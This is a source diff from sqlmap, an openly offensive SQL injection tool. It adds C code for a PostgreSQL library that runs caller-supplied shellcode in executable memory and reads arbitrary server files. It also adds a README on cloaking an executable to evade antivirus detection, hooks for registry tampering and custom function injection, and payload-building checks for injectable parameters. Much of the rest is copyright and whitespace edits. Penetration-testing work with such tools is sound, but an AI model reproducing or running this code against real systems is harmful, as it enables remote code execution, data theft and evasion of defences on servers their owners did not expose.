+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		PG_RETURN_INT32(1);
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			PG_RETURN_INT32(1);
+
+		strncpy((char *)addr, VARDATA(argv0), len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	PG_RETURN_INT32(0);
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj

@@ -0,0 +1,194 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_postgresqludf_sys"
+	ProjectGUID="{3527D58C-177A-47B3-981B-8104EBB3F943}"
+	RootNamespace="lib_postgresqludf_sys"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib;$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="false"
+				SubSystem="0"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_postgresqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

lib/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/contrib/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/contrib/magic.py

@@ -10,8 +10,6 @@ Reference: http://hupp.org/adam/hg/python-magic
 License: PSF (http://www.python.org/psf/license/)
 """
 
-
-
 import os.path
 import ctypes
 import ctypes.util
@@ -42,7 +40,6 @@ class Magic:
 
         magic_load(self.cookie, magic_file)
 
-
     def from_buffer(self, buf):
         """
         Identify the contents of `buf`
@@ -63,9 +60,8 @@ class Magic:
     def __del__(self):
         try:
             magic_close(self.cookie)
-        except Exception, e:
-            print "got thig: ", e
-
+        except Exception, _:
+            pass
 
 _magic_mime = None
 _magic = None
@@ -96,8 +92,6 @@ def from_buffer(buffer, mime=False):
     m = _get_magic_type(mime)
     return m.from_buffer(buffer)
 
-
-
 try:
     libmagic = ctypes.CDLL(ctypes.util.find_library('magic'))
 
@@ -132,17 +126,14 @@ try:
     magic_file.argtypes = [magic_t, c_char_p]
     magic_file.errcheck = errorcheck
 
-
     _magic_buffer = libmagic.magic_buffer
     _magic_buffer.restype = c_char_p
     _magic_buffer.argtypes = [magic_t, c_void_p, c_size_t]
     _magic_buffer.errcheck = errorcheck
 
-
     def magic_buffer(cookie, buf):
         return _magic_buffer(cookie, buf, len(buf))
 
-
     magic_load = libmagic.magic_load
     magic_load.restype = c_int
     magic_load.argtypes = [magic_t, c_char_p]
@@ -162,7 +153,6 @@ try:
 except:
     pass
 
-
 MAGIC_NONE = 0x000000 # No flags
 
 MAGIC_DEBUG = 0x000001 # Turn on debugging

lib/contrib/multipartpost.py

@@ -22,8 +22,6 @@ License along with this library; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import mimetools
 import mimetypes
 import os
@@ -39,7 +37,6 @@ class Callable:
     def __init__(self, anycallable):
         self.__call__ = anycallable
 
-
 # Controls how sequences are uncoded. If true, elements may be given
 # multiple values by assigning a sequence.
 doseq = 1
@@ -50,12 +47,14 @@ class MultipartPostHandler(urllib2.BaseHandler):
 
     def http_request(self, request):
         data = request.get_data()
+        
         if data is not None and type(data) != str:
             v_files = []
             v_vars = []
+            
             try:
                 for(key, value) in data.items():
-                     if type(value) == file:
+                    if type(value) == file or hasattr(value, 'file'):
                         v_files.append((key, value))
                     else:
                         v_vars.append((key, value))
@@ -75,16 +74,18 @@ class MultipartPostHandler(urllib2.BaseHandler):
             request.add_data(data)
         return request
 
-
     def multipart_encode(vars, files, boundary = None, buffer = None):
         if boundary is None:
             boundary = mimetools.choose_boundary()
+
         if buffer is None:
             buffer = ''
+
         for(key, value) in vars:
             buffer += '--%s\r\n' % boundary
             buffer += 'Content-Disposition: form-data; name="%s"' % key
             buffer += '\r\n\r\n' + value + '\r\n'
+
         for(key, fd) in files:
             file_size = os.fstat(fd.fileno())[stat.ST_SIZE]
             filename = fd.name.split('/')[-1]
@@ -95,9 +96,11 @@ class MultipartPostHandler(urllib2.BaseHandler):
             # buffer += 'Content-Length: %s\r\n' % file_size
             fd.seek(0)
             buffer += '\r\n' + fd.read() + '\r\n'
+
         buffer += '--%s--\r\n\r\n' % boundary
+
         return boundary, buffer
+
     multipart_encode = Callable(multipart_encode)
 
     https_request = http_request
-

lib/contrib/upx/windows/README.txt

@@ -0,0 +1,11 @@
+Due to the anti-virus positive detection of executable stored inside this
+folder,  we needed to somehow circumvent this. As from the plain sqlmap
+users perspective nothing has to be done prior to its usage by sqlmap, but
+if you want to have access to the original executable use the decrypt
+functionality of the ../../../../extra/cloak/cloak.py utility.
+
+To prepare the executable to the cloaked form use this command:
+python ../../../../extra/cloak/cloak.py -i upx.exe
+
+To get back the original executable use this:
+python ../../../../extra/cloak/cloak.py -d -i upx.exe_

lib/controller/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/controller/action.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.controller.handler import setHandler
 from lib.core.common import getHtmlErrorFp
 from lib.core.data import conf
@@ -35,7 +33,6 @@ from lib.techniques.blind.timebased import timeTest
 from lib.techniques.inband.union.test import unionTest
 from lib.techniques.outband.stacked import stackedTest
 
-
 def action():
     """
     This function exploit the SQL injection on the affected
@@ -125,6 +122,10 @@ def action():
     if conf.sqlShell:
         conf.dbmsHandler.sqlShell()
 
+    # User-defined function options
+    if conf.udfInject:
+        conf.dbmsHandler.udfInjectCustom()
+
     # File system options
     if conf.rFile:
         dumper.string("%s file saved to" % conf.rFile, conf.dbmsHandler.readFile(conf.rFile), sort=False)
@@ -148,6 +149,16 @@ def action():
     if conf.osBof:
         conf.dbmsHandler.osBof()
 
+    # Windows registry options
+    if conf.regRead:
+        dumper.string("Registry key value data", conf.dbmsHandler.regRead())
+
+    if conf.regAdd:
+        conf.dbmsHandler.regAdd()
+
+    if conf.regDel:
+        conf.dbmsHandler.regDel()
+
     # Miscellaneous options
     if conf.cleanup:
         conf.dbmsHandler.cleanup()

lib/controller/checks.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,12 +22,9 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 import time
 
-from lib.controller.action import action
 from lib.core.agent import agent
 from lib.core.common import randomInt
 from lib.core.common import randomStr
@@ -36,11 +33,11 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapConnectionException
+from lib.core.exception import sqlmapNoneDataException
 from lib.core.session import setString
 from lib.core.session import setRegexp
 from lib.request.connect import Connect as Request
 
-
 def checkSqlInjection(place, parameter, value, parenthesis):
     """
     This function checks if the GET, POST, Cookie, User-Agent
@@ -72,11 +69,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
         payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt, postfix))
         trueResult = Request.queryPage(payload, place)
 
-        if trueResult == True:
+        if trueResult:
             payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1, postfix))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "confirming custom injection "
                 infoMsg += "on %s parameter '%s'" % (place, parameter)
                 logger.info(infoMsg)
@@ -84,7 +81,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
                 payload = agent.payload(place, parameter, value, "%s%s%s AND %s%s %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randStr, postfix))
                 falseResult = Request.queryPage(payload, place)
 
-                if falseResult != True:
+                if not falseResult:
                     infoMsg  = "%s parameter '%s' is " % (place, parameter)
                     infoMsg += "custom injectable "
                     logger.info(infoMsg)
@@ -98,11 +95,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming unescaped numeric injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -110,7 +107,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "unescaped numeric injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -129,11 +126,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming single quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -141,7 +138,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "single quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -160,11 +157,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming LIKE single quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -172,7 +169,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "LIKE single quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -191,11 +188,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming double quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -203,7 +200,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s\"%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "double quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -222,11 +219,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming LIKE double quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -234,7 +231,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s\"%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "LIKE double quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -248,7 +245,6 @@ def checkSqlInjection(place, parameter, value, parenthesis):
 
     return None
 
-
 def checkDynParam(place, parameter, value):
     """
     This function checks if the url parameter is dynamic. If it is
@@ -280,7 +276,6 @@ def checkDynParam(place, parameter, value):
 
     return condition
 
-
 def checkStability():
     """
     This function checks if the URL content is stable requesting the
@@ -295,19 +290,25 @@ def checkStability():
     infoMsg = "testing if the url is stable, wait a few seconds"
     logger.info(infoMsg)
 
-    firstPage, firstHeaders = Request.queryPage(content=True)
+    firstPage, _ = Request.queryPage(content=True)
     time.sleep(1)
-    secondPage, secondHeaders = Request.queryPage(content=True)
+    secondPage, _ = Request.queryPage(content=True)
 
-    condition = firstPage == secondPage
+    condition = (firstPage == secondPage)
 
-    if condition == True:
+    if condition:
+        if firstPage:
             conf.md5hash = md5hash(firstPage)
-
             logMsg  = "url is stable"
             logger.info(logMsg)
+        else:
+            exceptionMsg   = "there was an error checking the stability of page "
+            exceptionMsg  += "because of lack of content. please check the "
+            exceptionMsg  += "page request results (and probable errors) by "
+            exceptionMsg  += "using higher verbosity levels"
+            raise sqlmapNoneDataException, exceptionMsg
 
-    elif condition == False:
+    elif not condition:
         warnMsg  = "url is not stable, sqlmap will base the page "
         warnMsg += "comparison on a sequence matcher, if no dynamic nor "
         warnMsg += "injectable parameters are detected, refer to user's "
@@ -317,7 +318,6 @@ def checkStability():
 
     return condition
 
-
 def checkString():
     if not conf.string:
         return True
@@ -348,7 +348,6 @@ def checkString():
 
         return False
 
-
 def checkRegexp():
     if not conf.regexp:
         return True
@@ -380,7 +379,6 @@ def checkRegexp():
 
         return False
 
-
 def checkConnection():
     infoMsg = "testing connection to the target url"
     logger.info(infoMsg)

lib/controller/controller.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.controller.action import action
 from lib.controller.checks import checkSqlInjection
 from lib.controller.checks import checkDynParam
@@ -32,18 +30,17 @@ from lib.controller.checks import checkString
 from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkConnection
 from lib.core.common import paramToDict
+from lib.core.common import parseTargetUrl
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
-from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapNotVulnerableException
 from lib.core.session import setInjection
 from lib.core.target import createTargetDirs
 from lib.core.target import initTargetEnv
 from lib.utils.parenthesis import checkForParenthesis
 
-
 def __selectInjection(injData):
     """
     Selection function for injection place, parameters and type.
@@ -84,7 +81,6 @@ def __selectInjection(injData):
 
     return injData[index]
 
-
 def start():
     """
     This function calls a function that performs checks on both URL
@@ -105,7 +101,6 @@ def start():
         logger.info(infoMsg)
 
     hostCount               = 0
-    receivedCookies         = []
     cookieStr               = ""
     setCookieAsInjectable   = True
 
@@ -139,11 +134,14 @@ def start():
             logMsg = "testing url %s" % targetUrl
             logger.info(logMsg)
 
+        parseTargetUrl()
+        createTargetDirs()
         initTargetEnv()
 
         if not checkConnection() or not checkString() or not checkRegexp():
             continue
 
+        if not conf.dropSetCookie:
             for _, cookie in enumerate(conf.cj):
                 cookie = str(cookie)
                 index  = cookie.index(" for ")
@@ -166,7 +164,7 @@ def start():
     
                 if setCookieAsInjectable:
                     conf.httpHeaders.append(("Cookie", cookieStr))
-                conf.parameters["Cookie"] = cookieStr.replace("%", "%%")
+                    conf.parameters["Cookie"] = cookieStr
                     __paramDict = paramToDict("Cookie", cookieStr)
     
                     if __paramDict:
@@ -202,7 +200,7 @@ def start():
                         logMsg = "%s parameter '%s' is dynamic" % (place, parameter)
                         logger.info(logMsg)
 
-                    if testSqlInj == True:
+                    if testSqlInj:
                         for parenthesis in range(0, 4):
                             logMsg  = "testing sql injection on %s " % place
                             logMsg += "parameter '%s' with " % parameter
@@ -248,20 +246,16 @@ def start():
         if not conf.multipleTargets and ( not kb.injPlace or not kb.injParameter or not kb.injType ):
             raise sqlmapNotVulnerableException, "all parameters are not injectable"
         elif kb.injPlace and kb.injParameter and kb.injType:
-            condition = False
-
             if conf.multipleTargets:
                 message = "do you want to exploit this SQL injection? [Y/n] "
                 exploit = readInput(message, default="Y")
 
-                if not exploit or exploit[0] in ("y", "Y"):
-                    condition = True
+                condition = not exploit or exploit[0] in ("y", "Y")
             else:
                 condition = True
 
             if condition:
                 checkForParenthesis()
-                createTargetDirs()
                 action()
 
     if conf.loggedToOut:

lib/controller/handler.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -37,7 +35,6 @@ from plugins.dbms.mysql import MySQLMap
 from plugins.dbms.oracle import OracleMap
 from plugins.dbms.postgresql import PostgreSQLMap
 
-
 def setHandler():
     """
     Detect which is the target web application back-end database

lib/core/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/core/agent.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,18 +22,16 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 
 from lib.core.common import randomInt
 from lib.core.common import randomStr
+from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import queries
 from lib.core.data import temp
 from lib.core.exception import sqlmapNoneDataException
-from lib.core.exception import sqlmapUnsupportedDBMSException
 
 
